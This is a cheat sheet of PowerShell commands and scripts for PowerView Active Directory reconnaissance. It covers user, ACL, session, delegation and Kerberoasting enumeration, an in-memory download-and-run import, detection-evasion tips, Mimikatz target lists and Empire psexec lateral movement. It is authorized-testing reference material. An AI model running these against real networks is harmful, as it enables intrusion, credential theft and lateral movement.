
PowerView Active Directory Enumeration Tool Cheat Sheet


Overview

PowerView is a PowerShell tool developed by Will Schroeder (@harmj0y) as part of the PowerSploit framework. It is designed for Active Directory enumeration and exploitation and provides extensive functionality for domain reconnaissance, privilege escalation path discovery, and attack vector identification in Windows environments.

Warning: This tool is intended only for authorized penetration testing and security assessments. Ensure you have proper authorization before using it in any environment.

Installation

PowerSploit Installation

```powershell
# Download PowerSploit
Invoke-WebRequest -Uri "https://github.com/PowerShellMafia/PowerSploit/archive/master.zip" -OutFile "PowerSploit.zip"
Expand-Archive -Path "PowerSploit.zip" -DestinationPath "C:\Tools\"

# Import PowerView
Import-Module C:\Tools\PowerSploit-master\Recon\PowerView.ps1

# Alternative: direct in-memory import
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')
```

Standalone PowerView

```powershell
# Download standalone PowerView
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1" -OutFile "PowerView.ps1"

# Import PowerView
Import-Module .\PowerView.ps1

# Or dot-source it directly
. .\PowerView.ps1
```

Dev Branch (Latest Features)

```powershell
# Download the dev branch (more features)
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1" -OutFile "PowerView-dev.ps1"
Import-Module .\PowerView-dev.ps1
```

Basic Usage

Loading the Module and Getting Help

```powershell
# Import PowerView
Import-Module PowerView.ps1

# Get all PowerView commands
Get-Command -Module PowerView

# Get help for a specific function
Get-Help Get-DomainUser -Full

# List PowerView functions by prefix
Get-Command Get-Domain*
Get-Command Get-Net*
```

Basic Domain Information

```powershell
# Get current domain
Get-Domain

# Get domain controllers
Get-DomainController

# Get domain policy
Get-DomainPolicy

# Get domain trusts
Get-DomainTrust

# Get forest information
Get-Forest
```

Domain Enumeration

User Enumeration

```powershell
# Get all domain users
Get-DomainUser

# Get a specific user
Get-DomainUser -Identity administrator

# Get users with specific properties
Get-DomainUser -Properties samaccountname,description,pwdlastset

# Get users with an SPN set (Kerberoastable)
Get-DomainUser -SPN

# Get users with pre-authentication disabled (AS-REP Roastable)
Get-DomainUser -PreauthNotRequired

# Get privileged users (adminCount=1)
Get-DomainUser -AdminCount

# Get users with passwords not required
Get-DomainUser -PasswordNotRequired
```

Group Enumeration

```powershell
# Get all domain groups
Get-DomainGroup

# Get a specific group
Get-DomainGroup -Identity "Domain Admins"

# Get group members
Get-DomainGroupMember -Identity "Domain Admins"

# Get groups for a specific user
Get-DomainGroup -UserName administrator

# Get local groups on a machine
Get-NetLocalGroup -ComputerName server01

# Get local group members
Get-NetLocalGroupMember -ComputerName server01 -GroupName Administrators
```

Computer Enumeration

```powershell
# Get all domain computers
Get-DomainComputer

# Get computers with a specific OS
Get-DomainComputer -OperatingSystem "Server 2019"

# Get computer properties
Get-DomainComputer -Properties dnshostname,operatingsystem,lastlogontimestamp

# Get computers with unconstrained delegation
Get-DomainComputer -UnconstrainedDelegation

# Get computers with constrained delegation
Get-DomainComputer -TrustedToAuth

# Get domain controllers by hostname pattern
Get-DomainComputer -Properties dnshostname | Where-Object { $_.dnshostname -like "dc*" }
```

Service Principal Name (SPN) Enumeration

```powershell
# Get all SPNs
Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname

# Get specific SPN types
Get-DomainUser -SPN | Where-Object { $_.serviceprincipalname -like "*SQL*" }

# Get SPNs for a specific service
Get-DomainUser -SPN | Where-Object { $_.serviceprincipalname -like "*HTTP*" }

# Get unique SPN service classes (the part before the first '/')
Get-DomainUser -SPN |
    ForEach-Object { $_.serviceprincipalname } |
    ForEach-Object { ($_ -split '/')[0] } |
    Sort-Object -Unique
```

Network Enumeration

Session Enumeration

```powershell
# Get sessions on the local machine
Get-NetSession

# Get sessions on a remote machine
Get-NetSession -ComputerName server01

# Get sessions for all domain computers
Get-DomainComputer | ForEach-Object { Get-NetSession -ComputerName $_.dnshostname }

# Get logged-on users
Get-NetLoggedon -ComputerName server01

# Get locally logged-on users
Get-NetLoggedon -ComputerName server01 -LocalOnly
```

Share Enumeration

```powershell
# Get shares on the local machine
Get-NetShare

# Get shares on a remote machine
Get-NetShare -ComputerName server01

# Get shares for all domain computers
Get-DomainComputer | ForEach-Object { Get-NetShare -ComputerName $_.dnshostname }

# Find interesting shares
Find-DomainShare

# Find readable shares
Find-DomainShare -CheckShareAccess
```

Process Enumeration

```powershell
# Get processes on a remote machine
Get-NetProcess -ComputerName server01

# Get processes for a specific user
Get-NetProcess -ComputerName server01 | Where-Object { $_.owner -like "*administrator*" }

# Get processes across the domain
Get-DomainComputer | ForEach-Object { Get-NetProcess -ComputerName $_.dnshostname }
```

Access Control and Permissions

ACL Enumeration

```powershell
# Get ACLs for a domain object
Get-DomainObjectAcl -Identity "Domain Admins"

# Get ACLs with rights GUIDs resolved to names
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs

# Find interesting ACLs
Find-InterestingDomainAcl

# Get ACLs for a specific user
Get-DomainObjectAcl -Identity administrator -ResolveGUIDs

# Find objects with an ACE for a specific SID (replace with the SID of interest)
Get-DomainObjectAcl | Where-Object { $_.SecurityIdentifier -eq "S-1-5-21-..." }
```

Permission Analysis

```powershell
# Find objects modifiable by the current user
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object { $_.IdentityReferenceName -like "*$env:USERNAME*" }

# Find GenericAll permissions
Get-DomainObjectAcl -ResolveGUIDs | Where-Object { $_.ActiveDirectoryRights -like "*GenericAll*" }

# Find WriteDacl permissions
Get-DomainObjectAcl -ResolveGUIDs | Where-Object { $_.ActiveDirectoryRights -like "*WriteDacl*" }

# Find WriteOwner permissions
Get-DomainObjectAcl -ResolveGUIDs | Where-Object { $_.ActiveDirectoryRights -like "*WriteOwner*" }
```

Trust and Forest Enumeration

Domain Trust Analysis

```powershell
# Get domain trusts
Get-DomainTrust

# Get forest trusts
Get-ForestTrust

# Map domain trusts
Get-DomainTrustMapping

# Get external trusts
Get-DomainTrust -API | Where-Object { $_.trust_type -eq "TRUST_TYPE_EXTERNAL" }

# Get bidirectional trusts
Get-DomainTrust | Where-Object { $_.TrustDirection -eq "Bidirectional" }
```

Cross-Domain Enumeration

```powershell
# Enumerate users in a trusted domain
Get-DomainUser -Domain trusted.domain.com

# Enumerate groups in a trusted domain
Get-DomainGroup -Domain trusted.domain.com

# Get foreign group members
Get-DomainForeignGroupMember

# Get foreign users
Get-DomainForeignUser
```

Privilege Escalation Paths

Local Admin Access

```powershell
# Find local admin access
Find-LocalAdminAccess

# Test local admin access on a specific machine
Test-AdminAccess -ComputerName server01

# Find machines where the current user has local admin
Get-DomainComputer | ForEach-Object { Test-AdminAccess -ComputerName $_.dnshostname }

# Find machines where domain users have local admin
Find-DomainLocalGroupMember -GroupName Administrators
```

Delegation Analysis

```powershell
# Find unconstrained delegation
Get-DomainComputer -UnconstrainedDelegation

# Find constrained delegation
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# Find resource-based constrained delegation
Get-DomainComputer |
    Get-DomainObjectAcl -ResolveGUIDs |
    Where-Object { $_.ObjectAceType -eq "ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity" }
```

Kerberoasting Targets

```powershell
# Find Kerberoastable users
Get-DomainUser -SPN

# Get detailed Kerberoasting targets
Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname,pwdlastset,lastlogon

# Find high-value Kerberoasting targets
Get-DomainUser -SPN -AdminCount

# Find Kerberoastable users with old passwords (pwdlastset older than one year)
Get-DomainUser -SPN | Where-Object { $_.pwdlastset -lt (Get-Date).AddDays(-365) }
```

Attack Vector Discovery

BloodHound Data Collection

```powershell
# Collect data for BloodHound (requires SharpHound)
# PowerView can supplement BloodHound data collection

# Get user sessions for BloodHound
# Property names follow the master-branch PowerView (sesi10_*); the dev branch
# exposes them as UserName / CName instead
Get-DomainComputer | ForEach-Object {
    $computer = $_.dnshostname
    $sessions = Get-NetSession -ComputerName $computer
    foreach ($session in $sessions) {
        [PSCustomObject]@{
            Computer = $computer
            User     = $session.sesi10_username
            Source   = $session.sesi10_cname
        }
    }
}
```

Lateral Movement Paths

```powershell
# Find computers with sessions from high-value users
$highValueUsers = Get-DomainGroupMember -Identity "Domain Admins" | Select-Object -ExpandProperty MemberName
Get-DomainComputer | ForEach-Object {
    $computer = $_.dnshostname
    $sessions = Get-NetLoggedon -ComputerName $computer
    foreach ($session in $sessions) {
        if ($highValueUsers -contains $session.wkui1_username) {
            Write-Output "High-value user $($session.wkui1_username) logged on to $computer"
        }
    }
}

# Find machines where members of Domain Admins have sessions
Find-DomainUserLocation -UserGroupIdentity "Domain Admins"
```

Advanced Enumeration Techniques

LDAP Queries

```powershell
# Custom LDAP query: users with the PASSWD_NOTREQD bit (32) set in userAccountControl
Get-DomainUser -LDAPFilter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))"

# Find users with a specific attribute populated
Get-DomainUser -LDAPFilter "(&(objectCategory=person)(objectClass=user)(description=*))"

# Find computers with a specific OS
Get-DomainComputer -LDAPFilter "(&(objectCategory=computer)(operatingSystem=Server*))"

# Find groups with specific names
Get-DomainGroup -LDAPFilter "(&(objectCategory=group)(name=*admin*))"
```
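The first filter above uses the OID 1.2.840.113556.1.4.803, the LDAP bitwise-AND matching rule, against userAccountControl, and the literal 32 is the PASSWD_NOTREQD bit. The following PowerShell is an added example, not PowerView code or part of the original cheat sheet: it decodes a userAccountControl value into flag names and builds such filters from flag names, so an auditor can review weak account settings without hand-computing bitmasks. It assumes PowerView is loaded for the final Get-DomainUser call.

```powershell
# Added example (not PowerView code): decode userAccountControl bits and
# build the bitwise LDAP filters used above from flag names.
# Values are the documented userAccountControl bit flags.
$UacFlags = [ordered]@{
    SCRIPT                         = 0x0001
    ACCOUNTDISABLE                 = 0x0002
    LOCKOUT                        = 0x0010
    PASSWD_NOTREQD                 = 0x0020
    PASSWD_CANT_CHANGE             = 0x0040
    ENCRYPTED_TEXT_PWD_ALLOWED     = 0x0080
    NORMAL_ACCOUNT                 = 0x0200
    WORKSTATION_TRUST_ACCOUNT      = 0x1000
    SERVER_TRUST_ACCOUNT           = 0x2000
    DONT_EXPIRE_PASSWORD           = 0x10000
    SMARTCARD_REQUIRED             = 0x40000
    TRUSTED_FOR_DELEGATION         = 0x80000
    NOT_DELEGATED                  = 0x100000
    USE_DES_KEY_ONLY               = 0x200000
    DONT_REQ_PREAUTH               = 0x400000
    PASSWORD_EXPIRED               = 0x800000
    TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000
}

function ConvertFrom-UacValue {
    # Return the names of all flags set in a raw userAccountControl value
    param([Parameter(Mandatory)][int]$Value)
    foreach ($entry in $UacFlags.GetEnumerator()) {
        if (($Value -band $entry.Value) -ne 0) { $entry.Key }
    }
}

function New-UacLdapFilter {
    # 'All' requires every listed flag (rule 1.2.840.113556.1.4.803 = bitwise AND);
    # 'Any' matches if at least one is set (rule 1.2.840.113556.1.4.804 = bitwise OR)
    param(
        [Parameter(Mandatory)][string[]]$Flag,
        [ValidateSet('All', 'Any')][string]$Mode = 'All'
    )
    $mask = 0
    foreach ($name in $Flag) {
        if (-not $UacFlags.Contains($name)) { throw "Unknown userAccountControl flag: $name" }
        $mask = $mask -bor $UacFlags[$name]
    }
    $rule = if ($Mode -eq 'All') { '1.2.840.113556.1.4.803' } else { '1.2.840.113556.1.4.804' }
    "(&(objectCategory=person)(objectClass=user)(userAccountControl:${rule}:=$mask))"
}

# Constructed sample value: NORMAL_ACCOUNT + PASSWD_NOTREQD + DONT_REQ_PREAUTH
ConvertFrom-UacValue -Value (0x200 -bor 0x20 -bor 0x400000)

# Reproduces the cheat sheet's first LDAP filter (...:=32) from a flag name
New-UacLdapFilter -Flag PASSWD_NOTREQD

# Audit: accounts with either weakness, with their flags decoded (needs PowerView loaded)
$filter = New-UacLdapFilter -Flag PASSWD_NOTREQD, DONT_REQ_PREAUTH -Mode Any
Get-DomainUser -LDAPFilter $filter -Properties samaccountname,useraccountcontrol |
    ForEach-Object {
        [PSCustomObject]@{
            Account = $_.samaccountname
            Flags   = (ConvertFrom-UacValue -Value ([int]$_.useraccountcontrol)) -join ', '
        }
    }
```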

GPO Enumeration

```powershell
# Get all GPOs
Get-DomainGPO

# Get GPOs applied to a specific OU
Get-DomainGPO -ComputerIdentity "OU=Servers,DC=domain,DC=com"

# Find GPOs that set local group membership
Get-DomainGPOLocalGroup

# Map GPO local group settings to computers
Get-DomainGPOComputerLocalGroupMapping

# Find GPOs by display name
Get-DomainGPO | Where-Object { $_.displayname -like "*password*" }
```

OU and Container Analysis

```powershell
# Get all OUs
Get-DomainOU

# Get objects in a specific OU
Get-DomainComputer -SearchBase "OU=Servers,DC=domain,DC=com"

# Get OU ACLs
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs

# Find interesting OU permissions
Get-DomainOU |
    Get-DomainObjectAcl -ResolveGUIDs |
    Where-Object { $_.ActiveDirectoryRights -like "*GenericAll*" }
```

Stealth and Evasion

Avoiding Detection

```powershell
# Use alternate credentials
$cred = Get-Credential
Get-DomainUser -Credential $cred

# Use a specific domain controller
Get-DomainUser -Server dc02.domain.com

# Limit page size of queries
Get-DomainUser -ResultPageSize 100

# Bound the server-side time (seconds) a single query may take
Get-DomainUser -Server dc01.domain.com -ServerTimeLimit 30
```

Minimal Footprint Enumeration

```powershell
# Essential enumeration with minimal queries
$domain = Get-Domain
$domainAdmins = Get-DomainGroupMember -Identity "Domain Admins"
$spnUsers = Get-DomainUser -SPN
$computers = Get-DomainComputer -Properties dnshostname,operatingsystem

# Targeted enumeration
$targetUsers = @("administrator", "service_account", "backup_admin")
foreach ($user in $targetUsers) {
    Get-DomainUser -Identity $user
}
```

Automation and Reporting

Comprehensive Domain Assessment

```powershell
# Comprehensive domain assessment script
param(
    [string]$OutputPath = "C:\Temp\DomainAssessment",
    [string]$Domain = $env:USERDOMAIN
)

# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force | Out-Null

Write-Host "[+] Starting comprehensive domain assessment for $Domain"

# Domain information
Write-Host "[+] Gathering domain information..."
Get-Domain | Out-File "$OutputPath\domain_info.txt"
Get-DomainController | Out-File "$OutputPath\domain_controllers.txt"
Get-DomainTrust | Out-File "$OutputPath\domain_trusts.txt"

# User enumeration
Write-Host "[+] Enumerating users..."
Get-DomainUser | Export-Csv "$OutputPath\domain_users.csv" -NoTypeInformation
Get-DomainUser -SPN | Export-Csv "$OutputPath\spn_users.csv" -NoTypeInformation
Get-DomainUser -AdminCount | Export-Csv "$OutputPath\privileged_users.csv" -NoTypeInformation

# Group enumeration
Write-Host "[+] Enumerating groups..."
Get-DomainGroup | Export-Csv "$OutputPath\domain_groups.csv" -NoTypeInformation
Get-DomainGroupMember -Identity "Domain Admins" | Export-Csv "$OutputPath\domain_admins.csv" -NoTypeInformation

# Computer enumeration
Write-Host "[+] Enumerating computers..."
Get-DomainComputer | Export-Csv "$OutputPath\domain_computers.csv" -NoTypeInformation
Get-DomainComputer -UnconstrainedDelegation | Export-Csv "$OutputPath\unconstrained_delegation.csv" -NoTypeInformation

# Share enumeration
Write-Host "[+] Enumerating shares..."
Find-DomainShare | Export-Csv "$OutputPath\domain_shares.csv" -NoTypeInformation

# ACL analysis
Write-Host "[+] Analyzing ACLs..."
Find-InterestingDomainAcl -ResolveGUIDs | Export-Csv "$OutputPath\interesting_acls.csv" -NoTypeInformation

Write-Host "[+] Assessment complete. Results saved to $OutputPath"
```

Privilege Escalation Path Discovery

```powershell
# Privilege escalation path discovery script
param(
    [string]$TargetUser = "administrator",
    [string]$OutputPath = "C:\Temp\PrivEscPaths"
)

New-Item -ItemType Directory -Path $OutputPath -Force | Out-Null

Write-Host "[+] Discovering privilege escalation paths to $TargetUser"

# Find local admin access
Write-Host "[+] Finding local admin access..."
$localAdminAccess = Find-LocalAdminAccess
$localAdminAccess | Out-File "$OutputPath\local_admin_access.txt"

# Find user sessions
Write-Host "[+] Finding user sessions..."
$userSessions = Get-DomainComputer | ForEach-Object {
    $computer = $_.dnshostname
    try {
        $sessions = Get-NetSession -ComputerName $computer -ErrorAction SilentlyContinue
        foreach ($session in $sessions) {
            [PSCustomObject]@{
                Computer = $computer
                User     = $session.sesi10_username
                Source   = $session.sesi10_cname
            }
        }
    } catch {}
}
$userSessions | Export-Csv "$OutputPath\user_sessions.csv" -NoTypeInformation

# Find Kerberoastable users
Write-Host "[+] Finding Kerberoastable users..."
$kerberoastable = Get-DomainUser -SPN
$kerberoastable | Export-Csv "$OutputPath\kerberoastable_users.csv" -NoTypeInformation

# Find delegation opportunities
Write-Host "[+] Finding delegation opportunities..."
$delegation = @()
$delegation += Get-DomainComputer -UnconstrainedDelegation |
    Select-Object @{Name="Type";Expression={"Unconstrained"}}, @{Name="Object";Expression={$_.dnshostname}}
$delegation += Get-DomainUser -TrustedToAuth |
    Select-Object @{Name="Type";Expression={"Constrained"}}, @{Name="Object";Expression={$_.samaccountname}}
$delegation | Export-Csv "$OutputPath\delegation_opportunities.csv" -NoTypeInformation

Write-Host "[+] Privilege escalation path discovery complete"
```

Network Mapping Script

```powershell
# Network mapping script
param(
    [string]$OutputPath = "C:\Temp\NetworkMapping"
)

New-Item -ItemType Directory -Path $OutputPath -Force | Out-Null

Write-Host "[+] Starting network mapping"

# Get all computers
$computers = Get-DomainComputer -Properties dnshostname,operatingsystem

# Map shares
Write-Host "[+] Mapping shares..."
$allShares = @()
foreach ($computer in $computers) {
    try {
        $shares = Get-NetShare -ComputerName $computer.dnshostname -ErrorAction SilentlyContinue
        foreach ($share in $shares) {
            $allShares += [PSCustomObject]@{
                Computer  = $computer.dnshostname
                ShareName = $share.shi1_netname
                ShareType = $share.shi1_type
                Remark    = $share.shi1_remark
            }
        }
    } catch {}
}
$allShares | Export-Csv "$OutputPath\network_shares.csv" -NoTypeInformation

# Map sessions
Write-Host "[+] Mapping sessions..."
$allSessions = @()
foreach ($computer in $computers) {
    try {
        $sessions = Get-NetSession -ComputerName $computer.dnshostname -ErrorAction SilentlyContinue
        foreach ($session in $sessions) {
            $allSessions += [PSCustomObject]@{
                Computer = $computer.dnshostname
                User     = $session.sesi10_username
                Source   = $session.sesi10_cname
                Time     = $session.sesi10_time
            }
        }
    } catch {}
}
$allSessions | Export-Csv "$OutputPath\network_sessions.csv" -NoTypeInformation

Write-Host "[+] Network mapping complete"
```

Integration with Other Tools

BloodHound Integration

```powershell
# Supplement BloodHound data with PowerView

# Get additional session data
$sessions = Get-DomainComputer | ForEach-Object { Get-NetSession -ComputerName $_.dnshostname }

# Get additional local group data
$localGroups = Get-DomainComputer | ForEach-Object {
    Get-NetLocalGroupMember -ComputerName $_.dnshostname -GroupName Administrators
}

# Export for BloodHound custom queries
$sessions | ConvertTo-Json | Out-File "bloodhound_sessions.json"
$localGroups | ConvertTo-Json | Out-File "bloodhound_localgroups.json"
```

Mimikatz Integration

```powershell
# Find targets for Mimikatz
$highValueSessions = Get-DomainComputer | ForEach-Object {
    $computer = $_.dnshostname
    $sessions = Get-NetLoggedon -ComputerName $computer
    $sessions | Where-Object { $_.wkui1_username -in @("administrator", "domain admin", "enterprise admin") }
}

# Output targets for credential dumping
$highValueSessions | Select-Object Computer, User | Export-Csv "mimikatz_targets.csv" -NoTypeInformation
```

Empire Integration

```powershell
# Generate target list for Empire
$targets = Find-LocalAdminAccess
$targets | ForEach-Object {
    Write-Output "usemodule lateral_movement/invoke_psexec"
    Write-Output "set ComputerName $_"
    Write-Output "execute"
}
```

Troubleshooting

Common Issues

```powershell
# LDAP query failures
# Check domain connectivity to the PDC emulator on the LDAP port
Test-NetConnection -ComputerName (Get-Domain).PdcRoleOwner -Port 389

# Permission issues
# Check current user context and group memberships
whoami /groups

# Network connectivity
# Test WMI access to a remote host
Get-WmiObject -Class Win32_OperatingSystem -ComputerName server01

# DNS resolution
# Test name resolution
Resolve-DnsName domain.com
```

Debug Mode

```powershell
# Enable verbose output
$VerbosePreference = "Continue"

# Test specific functions
Get-DomainUser -Identity administrator -Verbose

# Check the LDAP queries PowerView issues
Get-DomainUser -LDAPFilter "(samaccountname=administrator)" -Verbose
```

Best Practices

Operational Security

  1. **Use legitimate accounts**: Avoid suspicious service accounts
  2. **Limit queries**: Do not flood domain controllers with requests
  3. **Use specific targets**: Target specific objects rather than broad enumeration
  4. **Clean up**: Remove any created objects or modified ACLs
  5. **Monitor logs**: Be aware of the security events your activity generates

Enumeration Strategy

```powershell
# Phased approach

# Phase 1: Basic domain information
Get-Domain
Get-DomainController

# Phase 2: User and group enumeration
Get-DomainUser -Properties samaccountname,description
Get-DomainGroup -Properties samaccountname,description

# Phase 3: Privilege analysis
Get-DomainUser -AdminCount
Find-InterestingDomainAcl

# Phase 4: Attack vector identification
Get-DomainUser -SPN
Find-LocalAdminAccess
```

Resources

---

*This cheat sheet provides a comprehensive reference for using PowerView. Always ensure you have proper authorization before conducting Active Directory security assessments.*